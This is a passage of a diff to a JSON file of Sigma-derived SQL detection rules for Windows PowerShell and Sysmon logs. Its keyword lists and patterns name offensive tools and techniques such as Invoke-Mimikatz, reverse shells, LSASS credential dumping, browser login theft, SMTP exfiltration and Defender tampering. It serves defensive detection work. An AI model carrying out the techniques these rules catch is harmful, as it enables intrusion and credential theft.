'%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_malicious_commandlets.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Powershell Exfiltration Over SMTP", + "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "status": "experimental", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration", + "attack.t1048.003" + ], + "falsepositives": [ + "Legitimate script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" ], + "filename": "posh_ps_send_mailmessage.yml" + }, + { + "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", + "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "status": "experimental", + "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_frombase64string_archive.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "title": "Potential Active Directory Enumeration Using AD Module - PsScript", + "id": "9e620995-f2d8-4630-8430-4afd89f77604", "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Import-Module %' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\') OR ScriptBlockText LIKE '%ipmo Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\'))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_active_directory_module_dll_import.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "title": "Access to Browser Login Data", + "id": "fc028194-969d-4122-8abe-0470d5b8f12f", "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1552.001" + "attack.t1555.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Opera Software\\\\Opera Stable\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\Default%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data For Account%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_access_to_browser_login_data.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "PowerShell WMI Win32_Product Install MSI", + "id": "91109523-17f0-4248-a800-f81d9e7c081d", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_win32_product_install_msi.yml" }, { "title": "PowerShell Remote Session Creation", @@ -5632,15 +5489,28 @@ "filename": "posh_ps_remote_session_creation.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "title": "Potential In-Memory Execution Using Reflection.Assembly", + "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "status": "experimental", + "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "author": "frack113", + "falsepositives": [ + "Legitimate use of the library" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + ], + "filename": "posh_ps_dotnet_assembly_from_file.yml" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "description": "Detects PowerShell calling a credential prompt", + "author": "John Lambert (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.credential_access", "attack.execution", "attack.t1059.001" ], @@ -5649,94 +5519,99 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_prompt_credentials.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Request A Single Ticket via PowerShell", + "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "status": "test", + "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" ], - "filename": "posh_ps_psasyncshell.yml" + "filename": "posh_ps_request_kerberos_ticket.yml" }, { - "title": "Add New Windows Capability - ScriptBlock", - "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", + "id": "e54f5149-6ba3-49cf-b153-070d24679126", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "posh_ps_add_windows_capability.yml" + "filename": "posh_ps_invoke_obfuscation_via_var.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", + "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" + "filename": "posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "title": "Registry-Free Process Scope COR_PROFILER", + "id": "23590215-4702-4a70-8805-8dc9e58314a2", "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.persistence", + "attack.t1574.012" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -5745,170 +5620,153 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential WinAPI Calls Via PowerShell Scripts", - "id": "03d83090-8cba-44a0-b02f-0b756a050306", + "title": "Troubleshooting Pack Cmdlet Execution", + "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", "status": "experimental", - "description": "Detects use of WinAPI Functions in PowerShell scripts", - "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.t1106" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + "Legitimate usage of 